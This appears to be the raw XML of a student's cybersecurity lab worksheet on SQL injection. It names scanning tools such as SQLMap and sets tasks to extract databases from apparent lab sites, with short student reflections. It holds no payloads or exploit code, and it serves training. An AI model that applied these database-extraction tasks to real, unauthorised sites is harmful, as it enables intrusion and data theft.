          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-21"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>details. It should run a ping.exe process in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>background.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E79782B" w14:textId="5ADDC8C8" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487608320" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="219F436D" wp14:editId="4580021C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1124585</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>176530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5539740" cy="3154680"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="19"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9740" cy="3154680"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="DADAD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6ED9019" w14:textId="5AE9F63A" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                            <w:pPr>
                              <w:ind w:left="28"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Record your reflection here. What do you think is the vulnerability of this website?</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5C97E7DC" w14:textId="58DE9FAD" w:rsidR="00F83F1E" w:rsidRDefault="00F83F1E">
                            <w:pPr>
                              <w:ind w:left="28"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>The vulnerability is SQL injection as there is the ability to access sensitive information and create a malicious database.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19F436D" id="Text Box 4" o:spid="_x0000_s1047" type="#_x0000_t202" style="position:absolute;margin-left:88.55pt;margin-top:13.9pt;width:436.2pt;height:248.4pt;z-index:-1570816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yAAgIAAOkDAAAOAAAAZHJzL2Uyb0RvYy54bWysU9tu2zAMfR+wfxD0vjhpk16MOEWWoMOA&#10;rhvQ7gNkWbaFyaJGKbG7rx8lx1nRvQ2DAYHi5YjnkF7fDZ1hR4Vegy34YjbnTFkJlbZNwb8/33+4&#10;4cwHYSthwKqCvyjP7zbv3617l6sLaMFUChmBWJ/3ruBtCC7PMi9b1Qk/A6csBWvATgS6YpNVKHpC&#10;70x2MZ9fZT1g5RCk8p68+zHINwm/rpUMX+vaq8BMwam3kE5MZxnPbLMWeYPCtVqe2hD/0EUntKVH&#10;z1B7EQQ7oP4LqtMSwUMdZhK6DOpaS5U4EJvF/A2bp1Y4lbiQON6dZfL/D1Y+Hr8h0xXN7pYzKzqa&#10;0bMaAvsIA1tGeXrnc8p6cpQXBnJTaqLq3QPIH55Z2LXCNmqLCH2rREXtLWJl9qp0xPERpOy/QEXP&#10;iEOABDTU2EXtSA1G6DSml/NoYiuSnKvV5e31kkKSYpeL1fLqJg0vE/lU7tCHTwo6Fo2CI80+wYvj&#10;gw+xHZFPKfE1D0ZX99qYdMGm3BlkR0F7st/GLzF4k2ZsTLYQy0bE6Ek8I7WRZBjKYVT0etKvhOqF&#10;mCOM+0f/Cxkt4C/Oetq9gvufB4GKM/PZknpxUScDJ6OcDGEllRY8cDaauzAu9MGhblpCHudjYUsK&#10;1zpxj6MYuzj1S/uUJDntflzY1/eU9ecP3fwGAAD//wMAUEsDBBQABgAIAAAAIQCpc4y54AAAAAsB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUhcEHUStU0JcSoE4oYEFJDg5sbbJGq8&#10;DrFbh79ne4LjaEYzb8r1ZHtxxNF3jhSkswQEUu1MR42C97fH6xUIHzQZ3TtCBT/oYV2dn5W6MC7S&#10;Kx43oRFcQr7QCtoQhkJKX7dotZ+5AYm9nRutDizHRppRRy63vcySZCmt7ogXWj3gfYv1fnOwvPsV&#10;0++r/fPHaniIOOLTi/zcRaUuL6a7WxABp/AXhhM+o0PFTFt3IONFzzrPU44qyHK+cAok85sFiK2C&#10;RTZfgqxK+f9D9QsAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAA&#10;AAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD/gkyAAgIAAOkDAAAOAAAA&#10;AAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCpc4y54AAAAAsBAAAP&#10;AAAAAAAAAAAAAAAAAFwEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAaQUAAAAA&#10;" fillcolor="#dadada" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="16ED9019" w14:textId="5AE9F63A" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                      <w:pPr>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Record your reflection here. What do you think is the vulnerability of this website?</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5C97E7DC" w14:textId="58DE9FAD" w:rsidR="00F83F1E" w:rsidRDefault="00F83F1E">
                      <w:pPr>
                        <w:ind w:left="28"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>The vulnerability is SQL injection as there is the ability to access sensitive information and create a malicious database.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2503D96C" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:sectPr w:rsidR="00D02F84">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB8C8DF" w14:textId="0BCD004E" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:spacing w:before="82" w:line="328" w:lineRule="auto"/>
        <w:ind w:left="1200" w:right="3292" w:firstLine="1852"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15750656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75EA82B0" wp14:editId="2773428E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="18" name="Lin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EE7567E" id="Line 3" o:spid="_x0000_s1026" style="position:absolute;z-index:157506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2LqywEAAIMDAAAOAAAAZHJzL2Uyb0RvYy54bWysU02PGyEMvVfqf0Dcm0lSJdqOMtlD0u0l&#10;bSPt9gc4wMygAkZAMpN/X0M+dtveqs4BYWw/Pz97Vo+jNeykQtToGj6bTDlTTqDUrmv4j5enDw+c&#10;xQROgkGnGn5WkT+u379bDb5Wc+zRSBUYgbhYD77hfUq+rqooemUhTtArR84Wg4VEZugqGWAgdGuq&#10;+XS6rAYM0gcUKkZ63V6cfF3w21aJ9L1to0rMNJy4pXKGch7yWa1XUHcBfK/FlQb8AwsL2lHRO9QW&#10;ErBj0H9BWS0CRmzTRKCtsG21UKUH6mY2/aOb5x68Kr2QONHfZYr/D1Z8O+0D05JmR5NyYGlGO+0U&#10;+5ilGXysKWLj9iE3J0b37HcofkbmcNOD61Sh+HL2lDbLGdVvKdmIngochq8oKQaOCYtOYxtshiQF&#10;2FjGcb6PQ42JCXpcPiyX88WCM3HzVVDfEn2I6YtCy/Kl4YY4F2A47WLKRKC+heQ6Dp+0MWXaxrGh&#10;4Z8W80VJiGi0zM4cFkN32JjATpD3pXylK/K8DcvIW4j9Ja64LpsU8OhkqdIrkJ+v9wTaXO7Eyrir&#10;SlmYi8QHlOd9uKlHky70r1uZV+mtXbJf/531LwAAAP//AwBQSwMEFAAGAAgAAAAhAK8JI6XfAAAA&#10;DgEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPwzAMhe9I/IfISFymLekqJlqaTgjojQsDtGvWmLai&#10;cbom2wq/Hu+A4OZnPz1/r1hPrhdHHEPnSUOyUCCQam87ajS8vVbzWxAhGrKm94QavjDAury8KExu&#10;/Yle8LiJjeAQCrnR0MY45FKGukVnwsIPSHz78KMzkeXYSDuaE4e7Xi6VWklnOuIPrRnwocX6c3Nw&#10;GkL1jvvqe1bP1DZtPC73j89PRuvrq+n+DkTEKf6Z4YzP6FAy084fyAbRs1ZZylYebtIkA3G2JJla&#10;gdj97mRZyP81yh8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAA&#10;AAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAle9i6ssBAACDAwAADgAA&#10;AAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEArwkjpd8AAAAOAQAA&#10;DwAAAAAAAAAAAAAAAAAlBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAADEFAAAAAA==&#10;">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Other Tools and methods to try and record: </w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SQLMap (Detecting and Exploiting SQL Injection vulnerabilities) IBM Security AppScan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFED52D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="275" w:lineRule="exact"/>
        <w:ind w:left="1200"/>
      </w:pPr>
      <w:r>
        <w:t>N-Stalker Web Application Security Scanner X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6144E1BB" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A94C097" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27AD2BC9" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39758A13" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="1200"/>
      </w:pPr>
      <w:r>
        <w:t>Tasks to try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3EBC63" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="104"/>
        <w:ind w:left="1199"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection Attack to extract dababases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACE18BB" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="1200"/>
      </w:pPr>
      <w:r>
        <w:t>Use the above tools to scan and list out the vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F976DA9" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F56E149" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:spacing w:before="179" w:line="328" w:lineRule="auto"/>
        <w:ind w:left="1199" w:right="6033"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Try t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">hese with </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:w w:val="95"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>www.goodshopping.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:w w:val="95"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>www.moviescope.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="630D6EC8" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155FD084" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17CF13F9" w14:textId="59CC5259" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487609344" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40A48ED3" wp14:editId="548DAA55">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1124585</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>188595</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5539740" cy="3679190"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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9740" cy="3679190"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="DADAD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889AF55" w14:textId="6FA0A58F" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Record</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-3"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>your</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>reflection</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-14"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>here.</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-10"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-4"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>As</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>a</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-12"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>cybersecurity</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-17"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>analyst,</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>other</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>than</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>the</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-13"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">above tools what are the tools </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-3"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve">you </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>have discovered/ observed/ used/ tried? List them and record their usage, pros and cons comparing to the above listed and above used tools in this</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:spacing w:val="-1"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>lab.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="00FC4681" w14:textId="69297789" w:rsidR="00F83F1E" w:rsidRDefault="00F83F1E">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="76DBB735" w14:textId="0E27E037" w:rsidR="00F83F1E" w:rsidRDefault="00F83F1E">
                            <w:pPr>
                              <w:ind w:left="28" w:right="24"/>
                              <w:jc w:val="both"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Didn’t have time to complete this on time due to the major project and a networking exam by next Monday, but will complete this task by next session.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0A48ED3" id="Text Box 2" o:spid="_x0000_s1048" type="#_x0000_t202" style="position:absolute;margin-left:88.55pt;margin-top:14.85pt;width:436.2pt;height:289.7pt;z-index:-1570713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bOVAgIAAOkDAAAOAAAAZHJzL2Uyb0RvYy54bWysU9uK2zAQfS/0H4TeGyfZ7iUmzpImbCls&#10;L7DbD5Bl2RaVNepIiZ1+fUdynC7bt1IMYjSXozlnxuv7oTPsqNBrsAVfzOacKSuh0rYp+Pfnh3d3&#10;nPkgbCUMWFXwk/L8fvP2zbp3uVpCC6ZSyAjE+rx3BW9DcHmWedmqTvgZOGUpWAN2ItAVm6xC0RN6&#10;Z7LlfH6T9YCVQ5DKe/LuxyDfJPy6VjJ8rWuvAjMFp95COjGdZTyzzVrkDQrXanluQ/xDF53Qlh69&#10;QO1FEOyA+i+oTksED3WYSegyqGstVeJAbBbzV2yeWuFU4kLieHeRyf8/WPnl+A2Zrmh2t5xZ0dGM&#10;ntUQ2AcY2DLK0zufU9aTo7wwkJtSE1XvHkH+8MzCrhW2UVtE6FslKmpvESuzF6Ujjo8gZf8ZKnpG&#10;HAIkoKHGLmpHajBCpzGdLqOJrUhyXl9frW7fU0hS7OrmdrVYpeFlIp/KHfrwUUHHolFwpNkneHF8&#10;9CG2I/IpJb7mwejqQRuTLtiUO4PsKGhP9tv4JQav0oyNyRZi2YgYPYlnpDaSDEM5jIreTfqVUJ2I&#10;OcK4f/S/kNEC/uKsp90ruP95EKg4M58sqRcXdTJwMsrJEFZSacEDZ6O5C+NCHxzqpiXkcT4WtqRw&#10;rRP3OIqxi3O/tE9JkvPux4V9eU9Zf/7QzW8AAAD//wMAUEsDBBQABgAIAAAAIQD0Pfpc4AAAAAsB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUhcELVTQdOEOBUCcUOiFJDg5sbbJGps&#10;B9utw9+zPcFxtE8zb6vVZAZ2RB96ZyVkMwEMbeN0b1sJ729P10tgISqr1eAsSvjBAKv6/KxSpXbJ&#10;vuJxE1tGJTaUSkIX41hyHpoOjQozN6Kl2855oyJF33LtVaJyM/C5EAtuVG9poVMjPnTY7DcHQ7tf&#10;Kfu+2r98LMfHhB6f1/xzl6S8vJju74BFnOIfDCd9UoeanLbuYHVgA+U8zwiVMC9yYCdA3BS3wLYS&#10;FqLIgNcV//9D/QsAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAA&#10;AAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCg8bOVAgIAAOkDAAAOAAAA&#10;AAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQD0Pfpc4AAAAAsBAAAP&#10;AAAAAAAAAAAAAAAAAFwEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAaQUAAAAA&#10;" fillcolor="#dadada" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3889AF55" w14:textId="6FA0A58F" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                      <w:pPr>
                        <w:ind w:left="28" w:right="24"/>
                        <w:jc w:val="both"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Record</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-3"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>your</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-13"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>reflection</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-14"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>here.</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-10"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:spacing w:val="-4"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>As</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
